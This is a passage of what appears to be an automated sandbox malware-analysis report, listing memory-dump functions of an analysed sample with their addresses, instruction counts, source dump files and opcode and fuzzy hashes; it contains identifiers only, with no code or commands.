                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9b4fd74bfcc621492ae04588df892edf145e8083dcc9c407bb5bb636b960a344
                                                          • Instruction ID: 49e0adebdc1baf7a05878fdbbf9e07baa55bf88db0321b7424c6952490ab8f77
                                                          • Opcode Fuzzy Hash: 9b4fd74bfcc621492ae04588df892edf145e8083dcc9c407bb5bb636b960a344
                                                          • Instruction Fuzzy Hash: FA01DF71240A01AFD3355B59D900B5ABAA8AF54F60F14443EF2969B394C7B1A8818B64
                                                          Function 01022582 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe1c5d0ef717073ec0f24a9f0c1dd9197b6a32270b48cab64adff7067529d6b
                                                          • Instruction ID: 7ca3903fb9a5bcc1a4a494d7654fb85fe52df126171c5ed3be271a8a0e326875
                                                          • Opcode Fuzzy Hash: cfe1c5d0ef717073ec0f24a9f0c1dd9197b6a32270b48cab64adff7067529d6b
                                                          • Instruction Fuzzy Hash: 8AF0A432A41B35B7C7319B9A8D40F57BAAEEBC4B90F158029E6459B650DA34ED01CBA0
                                                          Function 00407ADD Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f299c77836bf3f1b68656ded1a5a8e33b97fa2103f62d13538da4491a53f8499
                                                          • Instruction ID: cd780cf196a94253c8cc7fb82b108c6bfe139aad288c5d37431de3fe68fd7885
                                                          • Opcode Fuzzy Hash: f299c77836bf3f1b68656ded1a5a8e33b97fa2103f62d13538da4491a53f8499
                                                          • Instruction Fuzzy Hash: C9F02433A0DADC0FE7224E389C801D8FF64FB4B560B2C17AAD8C177202D261A8634785
                                                          Function 0104C073 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction ID: 871e547cb0e4ab2bbea2cfef2c3efb7b7a66849250a3329ec145bd8d4fe110f4
                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction Fuzzy Hash: 7FF0AFB2600611ABE328CF4D9D40E57FBEEDBD5A80F048168A545C7220EA31DD04CB90
                                                          Function 0101C310 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction ID: 1eee7d893b992b9549c690b9878c1fd40c4b6bc51398c0113194ebfb6136cdb2
                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction Fuzzy Hash: 57F02B33284A339BF736165D4940B6FAAD99FD1B64F1A4035F2899B64CCA6CCD0297D0
                                                          Function 010F634F Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de76503e4cc2ee8c7fbb9f203f623a40155e8502ea05b4d807a8b659fa4ccfcd
                                                          • Instruction ID: ecb82d5b2b2a476f59cc2509684d91ae9d144028ad62e9762e5f76979b5f87bf
                                                          • Opcode Fuzzy Hash: de76503e4cc2ee8c7fbb9f203f623a40155e8502ea05b4d807a8b659fa4ccfcd
                                                          • Instruction Fuzzy Hash: 59018471A1020DEFDB04DFA9E5519DEB7F8FF58300F10406AF944EB350D6349A008BA0
                                                          Function 010F625D Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5bd32cb44299bbca18fc4fb9f7f29ab8b7584547fe9aa1704f18f02a6484c62
                                                          • Instruction ID: 0bfbeda25414bf2d82a457a5afccc9911e2ba68a2eadade83be52d34f4c097e7
                                                          • Opcode Fuzzy Hash: b5bd32cb44299bbca18fc4fb9f7f29ab8b7584547fe9aa1704f18f02a6484c62
                                                          • Instruction Fuzzy Hash: 2C018471A1060DEFCB04DFA9D4519AEB7F8FF58300F10406AF904EB350D674AA00CBA0
                                                          Function 010F62D6 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35b237dcf3195c7bfd16ddeef9ea81c93a735c2858c61007f1def5a2410d680b
                                                          • Instruction ID: 7aad70de6bd09804214b782938fdbcdc8f4ac87ee4ee682574c4f9f843174ff7
                                                          • Opcode Fuzzy Hash: 35b237dcf3195c7bfd16ddeef9ea81c93a735c2858c61007f1def5a2410d680b
                                                          • Instruction Fuzzy Hash: 96018471A0020DEFDB04DFA9E45199EB7F8FF58300F50806AFA14EB350D6749D008BA0
                                                          Function 0105CA6F Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction ID: 6f63c4274ab44ff94f268a4ee00f56a1c9f087af0dbcc603f092a98afb384f7b
                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction Fuzzy Hash: BA01D6312006899BE762965DD909B9BBFDCEF42754F0884A6FE848F791DA79C800C210
                                                          Function 010F61E5 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd1fc1935cde2d9c570bdbd589785c54d060c1d6e0a8d6322dd97611dc22e17a
                                                          • Instruction ID: 1ec5e1ecbec365aef007dceb64d9d05b3bacd0239a779c1d5d208035a67563f8
                                                          • Opcode Fuzzy Hash: cd1fc1935cde2d9c570bdbd589785c54d060c1d6e0a8d6322dd97611dc22e17a
                                                          • Instruction Fuzzy Hash: 00018F71A006499BDB04DFA9E445AEEBBF8BF58310F14405AF540EB380D738EA01CB94
                                                          Function 010A63C0 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction ID: ba4ae13015e031867259cee68cc0f7570c11dba9dfb39a621cd35c58a67d23b4
                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction Fuzzy Hash: 13F01D7220001DBFEF019F94DD80DEF7B7EEB59298B144125FA1196160D636DD21ABA0
                                                          Function 010AA4B0 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d46ebf89ad09737b7b84db40af0470fd2ed9b4ad3cfa6ae24f3d0804e42657b
                                                          • Instruction ID: 3ea0e462c31963bdc1a1c1909319efff27d41b2ae667751d1e3999b6cdcd30c8
                                                          • Opcode Fuzzy Hash: 9d46ebf89ad09737b7b84db40af0470fd2ed9b4ad3cfa6ae24f3d0804e42657b
                                                          • Instruction Fuzzy Hash: FB018936200219EBCF129E94D940EDE7FA6FB4C664F058111FE6866260C732D9B0EB81
                                                          Function 0101C0F0 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62582a6f5b6c71a13c77c7b7a8923ac38f8428e9929fbd9d4cdc3177666ff1a8
                                                          • Instruction ID: fdbb3a0c1aff009e091c2d49b0456e5b3dd1762d15ab7cc41d3f51386d7e390a
                                                          • Opcode Fuzzy Hash: 62582a6f5b6c71a13c77c7b7a8923ac38f8428e9929fbd9d4cdc3177666ff1a8
                                                          • Instruction Fuzzy Hash: C5F02B713C43455BF350A5198D01F7272D5EBC1750F6D80B6EB458F2D5EA75DC018394
                                                          Function 0105656A Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65cabc1db2f398613ec4a824356ea70afd95505d9c6b992b81900726e982763c
                                                          • Instruction ID: 507a810fefc7255fc90bad10199e63e2866aa83da7fec0df29d84a6eb1a20e0f
                                                          • Opcode Fuzzy Hash: 65cabc1db2f398613ec4a824356ea70afd95505d9c6b992b81900726e982763c
                                                          • Instruction Fuzzy Hash: 3001A4702406819BE7A69B7CDE58B6A37E8BB41B48FD885D0BEC1CB6D6D729D442C210
                                                          Function 010C437C Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction ID: 754fe275f26bda673a0367be4970b077a5bf7095e83c5d5560411a5080a17008
                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction Fuzzy Hash: 44F0E931341E1347E7B5AB2E8C70B2EBAD5BFD0E00B05866C95C1DB680DF20DC008B90
                                                          Function 010AE872 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction ID: f5f4c9bd14a01038b571adb2e6409cdbdb3f0f21c076d927964f87d645b98f6a
                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction Fuzzy Hash: A2F089337115119BD3319A8DCCC0F16B7A8EFD5A60F9A0075A6489F260C764EC01C7D0
                                                          Function 010AC89D Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a779c980c6863ef78183ffe0fe475f70200b664486f1ba4659b169d2e2bb802
                                                          • Instruction ID: 4f1e2d3ba34b79719b4c948f03160f13317bc2c43d1448542caaec7e91232608
                                                          • Opcode Fuzzy Hash: 1a779c980c6863ef78183ffe0fe475f70200b664486f1ba4659b169d2e2bb802
                                                          • Instruction Fuzzy Hash: AFF0C2706197049FD314EF68C545A1FB7E8FF98710F80465AB8D8DB394E634E900C796
                                                          Function 01050854 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction ID: ab15c19d389b9d1f2cb8bf18124536dc31a79cfebd9e59defcd6a6087ca6948f
                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction Fuzzy Hash: 2CF0B472610204AFE714DB25CC01F9BB6E9EF98350F148079A9C5D7164FAB1ED01C654
                                                          Function 010AC912 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a0423f8cce20b95fc82d14c5e25f9e10a911d50914a3b13d61621eae12f9b13
                                                          • Instruction ID: dbbda69df018705fd7fdc384d11fddb53599e9ca1abfc737c7d4359a60050c91
                                                          • Opcode Fuzzy Hash: 1a0423f8cce20b95fc82d14c5e25f9e10a911d50914a3b13d61621eae12f9b13
                                                          • Instruction Fuzzy Hash: 46F0C270A0020DDFDB04EFA9D615A9EB7F8FF18300F008065B895EB385DA38EA01CB90
                                                          Function 010247FB Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b5b252a7a2db114529a192c266840a9073f668fc7792b6110ca9e8d3af92e89
                                                          • Instruction ID: 1d3eff4668589f69e62fc0ee7ca76c526dd3f81690d6145b2dd38d4892f71415
                                                          • Opcode Fuzzy Hash: 7b5b252a7a2db114529a192c266840a9073f668fc7792b6110ca9e8d3af92e89
                                                          • Instruction Fuzzy Hash: 06F090319366F59EE7628F5CC044B6A7FD49B00A20F0949EAD9C9C7512C7A4D880C651
                                                          Function 010E0115 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0aaf74f0d5406869fa283d3c4bc83b797a0cd57bf0aa1fb6fe25b9d2c3aec30b
                                                          • Instruction ID: 06391a16c0677e2ecd7817a18ba3bc9fb9a6e36899eccc2ae74ff1ec4404799d
                                                          • Opcode Fuzzy Hash: 0aaf74f0d5406869fa283d3c4bc83b797a0cd57bf0aa1fb6fe25b9d2c3aec30b
                                                          • Instruction Fuzzy Hash: 67F0E2665157890ECB766A2C66583D1BBE5A742110F0A14DAE4F16B20DD5F6C883C320
                                                          Function 0105C5ED Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ff2dec1577dd3b02da843423f5135e6ee984eef9e98bf59bd8e88ca1f5ac9a0
                                                          • Instruction ID: d8a38a23f3f0468ebbae7a2e8275cded36c753c8dbb4cd0c978911842ceca790
                                                          • Opcode Fuzzy Hash: 5ff2dec1577dd3b02da843423f5135e6ee984eef9e98bf59bd8e88ca1f5ac9a0
                                                          • Instruction Fuzzy Hash: 8BF0BE755117959FF3E29A1CC248B637BDCAB48BA0F0998A5DD8687512C2A0EA80CA60
                                                          Function 01062619 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction ID: 0e4096ca799f733b754a45148e32c9bfcc4091224c1252aec3bb82fd0e48bb62
                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction Fuzzy Hash: 77E0D8323006012BE7119F598CC4F8777AEDFD6B10F040079B5045F251C9E2DD0983A4
                                                          Function 010B6030 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction ID: 7d6b90d7d46a99d1fdf9389f5f300a31434cdf021a653f2bf8f4bb1a747c274c
                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction Fuzzy Hash: CAF030721142049FE3218F0AD984FA7B7F8EB45364F45C065F6499B661D37AEC40CBA4
                                                          Function 01020710 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction ID: 6f37b8baed06a3e6d5092428368d78da3c3dfcb5236d63de29d29a8f606f0984
                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction Fuzzy Hash: DAF0E57A6043559BDB16DF19D040AE97BE8FB41350F0000D4F8C28B301D731E982CB54
                                                          Function 010549D0 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction ID: 83c07c3e9928086ff5b07d67b1fc75e98869cbc42bf9125ea02d040d7b9d8f97
                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction Fuzzy Hash: 1FE0D832244145ABD3E15A598804BEB77E9DBD47A0F150429EA88CB150FB70DCC0C7E8
                                                          Function 010F4164 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93673d05607306613ac676d463a87aed778c1d349bde8db3badd8baa5362cf53
                                                          • Instruction ID: 24273a71d18041874a4bac5e8e9b4ca75d748668ec9ffd645c15689c4f484281
                                                          • Opcode Fuzzy Hash: 93673d05607306613ac676d463a87aed778c1d349bde8db3badd8baa5362cf53
                                                          • Instruction Fuzzy Hash: 2EF0E531A265918FE7B2D72CD550B9377E4BF10730F0A05D8D980C7E12C364DC40C650
                                                          Function 010C678E Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction ID: 8e82eb69d3093c819c5a4cdd03e3f80b8108971c3b74ac5a9bb00b5d6e43b2a2
                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction Fuzzy Hash: EBE0DF32A00110BBDB31A7998D01FDBBEACEF94FA0F050058BA00E71A0E531DE00CAA0
                                                          Function 010F08C0 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction ID: 8b44bbecbe542f60ab4009ed3fe40d879a1848c1c0631dcd8c6b5f55e437398e
                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction Fuzzy Hash: A5E09B316403518BCB258A1DC142A97B7EDDF95661F1580ADEAD547A17C271F843C6D0
                                                          Function 010225E0 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b2e754f7009f4ca94d049ad5823400606e759722cc0aa62f63ee33d1c9cce326
                                                          • Instruction ID: 236c2b545cb93c75a2b1bd626fbddbc2d82a19240463b8b86b8bef62d9247b28
                                                          • Opcode Fuzzy Hash: b2e754f7009f4ca94d049ad5823400606e759722cc0aa62f63ee33d1c9cce326
                                                          • Instruction Fuzzy Hash: F2E092321005549BC321BB29DD01FCA779AEBA4360F014525F19597190CA34A850C784
                                                          Function 010DA456 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                          • Instruction ID: b05f31583e64bec29d293c90db958d66c97d4178bf94e3d07a56f1155cf82b6c
                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                          • Instruction Fuzzy Hash: C2E09231010711DFE7726F2AC948B927BE4FF90711F148C6CA0D6024B0CB7898C0CA40
                                                          Function 010A4000 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
